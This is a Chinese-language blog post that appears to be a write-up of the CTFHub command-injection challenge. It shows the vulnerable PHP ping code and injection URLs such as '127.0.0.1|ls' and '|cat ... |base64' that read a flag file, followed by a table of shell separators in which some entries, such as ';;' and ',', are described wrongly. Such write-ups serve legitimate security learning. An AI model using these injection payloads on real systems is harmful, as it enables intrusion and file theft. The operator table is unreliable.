CTFHub | 命令注入

最新推荐文章于 2024-05-12 04:00:10 发布
最新推荐文章于 2024-05-12 04:00:10 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: CTF精进之路 文章标签: web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/131205691
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

命令注入:

        这是一个在线测试网络延迟的平台,路由器中经常会见到。无任何安全措施,尝试获取 flag 。

网页显示内容

        

        

0x02 解题过程

检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了 ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $cmd = "ping -c 4 {$_GET['ip']}";
    exec($cmd, $res);
}

?>

        

在输入框中搜索 127.0.0.1 执行一下看看,回显成功,可以正常执行。

        

在 url 中加上管道符进行测试,发现页面返回了两个网页的文件夹。

http://challenge-8d27f992c490a241.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls

        

直接访问带有数字的 php 文件,因为 index.php文件就是当前页面,可以直接排除。

http://challenge-8d27f992c490a241.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat 312721736210240.php

         

检查返回页面发现无回显,查看网页源代码发现此题 flag 。

        

        

0x03 Base64显示

        当然,在解题过程中检查页面回显时,发现无回显并不是因为管道符不正确。而是因为在网页中,浏览器会将文本内容解析为 HTML 代码,并根据 HTML 代码生成相应的网页。如果你的文本中包含特殊字符,浏览器就会将这些特殊字符解析为 HTML 标签,导致文本内容无法在网页中正常显示。那么这时候你可以通过以 base64 编码形式进行解析,浏览器会输出 base64 编码后的文本进行输出,不执行 HTML 解析,所以可以在网页中正常显示。

        

关于 base64 的解题方法:

再使用一个 | 管道符号,将多个命令串联起来执行,将网页以 base64 编码返回到用户端。

http://challenge-8d27f992c490a241.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat%20312721736210240.php|base64

        

使用 base64 解码工具对密文进行解密,发现此题 flag 。

        

        

0x04 管道符号

        管道符号是一个可以连接多个命令的特殊符号。在 Unix 和 Linux 系统命令行中经常使用,通常用于将一个命令的输出作为另一个命令的输入,从而实现多个命令的协同工作。

        

常见的管道符号:

符号描述
|将一个命令的输出作为另一个命令的输入。
||在一个命令失败时执行另一个命令。
;在同一行中运行多个命令。
;;在同一行中运行多个命令,但只有在前一个命令成功时才会运行后一个命令。
,按顺序执行多个命令,但只返回最后一个命令的结果。
&&在一个命令成功时执行另一个命令。
<将一个文件的内容作为输入传递给一个命令。
>将一个命令的输出重定向到一个文件中。
>>将一个命令的输出追加到一个文件的末尾。

        

        

0x05 参考文献

[1].William Shotts. Learning the Shell[EB/OL]. [2023-06-14]. https://linuxcommand.org/lc3_learning_the_shell.php.

        

        

0x06 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
命令注入讲解ppt.pptx
08-10
命令注入讲解 命令注入是一种高危漏洞,指攻击者能够控制外部的参数达到随意执行系统命令的结果。命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
ctfhub——命令注入
m0_75007575的博客
04-05 334
这段代码首先检查是否存在名为ip的GET参数,并且该参数的值不为空。如果满足条件,将获取GET参数ip的值赋给变量$ip。接着,创建一个空数组$m,然后通过正则表达式preg_match_all("/\//", $ip, $m)来检查$ip中是否包含斜杠/。如果$ip中包含斜杠,则直接将匹配结果存储在数组$res中。既然不能使用目录分隔符,那我们就先进入目录再去查看文件。打开控制台发现代码里面出现了flag,即通过成功。运算符都被过滤掉了,我们也可以使用;回显空白,得到flag。回显空白,得到flag。
ctfhub-命令注入
m0_62094846的博客
12-15 328
看到有Ping直接写127.0.0.1看看 可以成功,再输入命令 每个都试一次 两个文件都试过了,都没有flag 然后看看上一个文件夹 然后也一个个试了,也没用 后面的都是这样的 看wp,是在48892291724801.php里面 以后看到有点奇怪的要留心一些,可能包含了flag,然后它的回显也不一样,就是有数据出来的样子,但是没有数据,就看看源代码 ...
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,2024年最新网络安全面试你必须要知道的那些知识
最新发布
2401_84302796的博客
05-12 862
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2055
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHub 命令注入-综合练习
qq_56096156的博客
03-21 912
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码,找到hub.
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 3819
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
ctfhub web全部做题记录(持续跟新)
01-08
【SQL注入】SQL注入Web应用中常见的安全漏洞,允许攻击者执行恶意SQL命令。分为整数型和字符型注入,以及报错注入。可以通过调整查询参数来获取数据库信息,甚至直接读取flag字段。 【文件上传漏洞】无验证的文件...
ctf:CTF评论|网络
04-19
周大福CTF评论|网络
3.18号日报,ctfhubweb,文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhubweb,文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8546
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
CTFHUB-RCE-命令注入
u014794539的博客
07-10 1265
命令注入 无过滤 考点 属于是纯纯的命令注入 思路分析 构造playload 127.0.0.1|ls 发现一个数字串挺长的php 构造 127.0.0.1|cat 18930164348325.php 提交了[1]没有东西 可以构造 127.0.0.1|cat 18930164348325.php|base64 然后base64解码 或者不加base64 查看源码也能得到 playload: ctfhub{af6df24d6b085066d0dc46d3} 过滤cat 考点 过滤cat
CTFHUB web-rce-命令注入
2301_79783285的博客
12-17 1096
命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。后台代码并未对用户输入的参数ip的值进行过滤就直接与ping命令进行拼接并执行 ,因此我们可以使用常见的命令拼接字符对命令进行拼接,如使用“&”,“|”,“&&”,“||”等,linux系统下还可以使用“;”,“``”。Windows支持的管道符。
CTFHub技能树web(持续更新)--RCE--命令注入
jiuyongpinyin的博客
01-26 197
命令注入 首先ping一下本机地址: 发现有回显,那就好办了,接下来查看当前目录的文件: 发现有一个很可疑的php文件,使用cat查看: 有回显,但是没有内容,尝试在url中访问也不行,最后想到了查看网页源代码: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
CTFHub -技能树 命令注入-无过滤
qq_45653588的博客
07-24 2025
0X00 命令注入-无过滤 进入页面后给出的源码,题目要求输入IP地址执行ping命令 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <html> <head> <title>CTF
CTFHub SQL注入(一)
2301_80911344的博客
04-08 896
如果用户输入没有得到充分的处理和逃逸,特别是包含SQL关键字(如SELECT, DROP, UNION)或特殊字符(如单引号',双引号",注释符--等),那么原始SQL语句可能会被篡改。其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分。是SQL中的注释符号,其后面的内容将被视作注释,因此这个查询将忽略密码校验,直接返回用户名为“admin”的用户信息,导致安全验证被绕过。注:列增加后将不能删除。
CTFHUB技能树】-命令注入RCE综合练习
zguohuai的博客
03-15 652
CTFHUB攻防世界解决命令行综合注入
命令注入(DVWA+buuctf pingpingping)
bin789456的博客
09-15 987
写在前面 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。 也就是在cmd等等命令行执行位置可以使用一些trick,自然你也会想到在CTF中会伴随一些关键字的屏蔽,当然也有一些绕过技巧。 这里主要是dvwa上的命令注入和一道CTF例题来说明 DVWA命令注入 后台代码并未对用户输入的参数ip的值进行过滤就直接与ping命令进行拼接
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值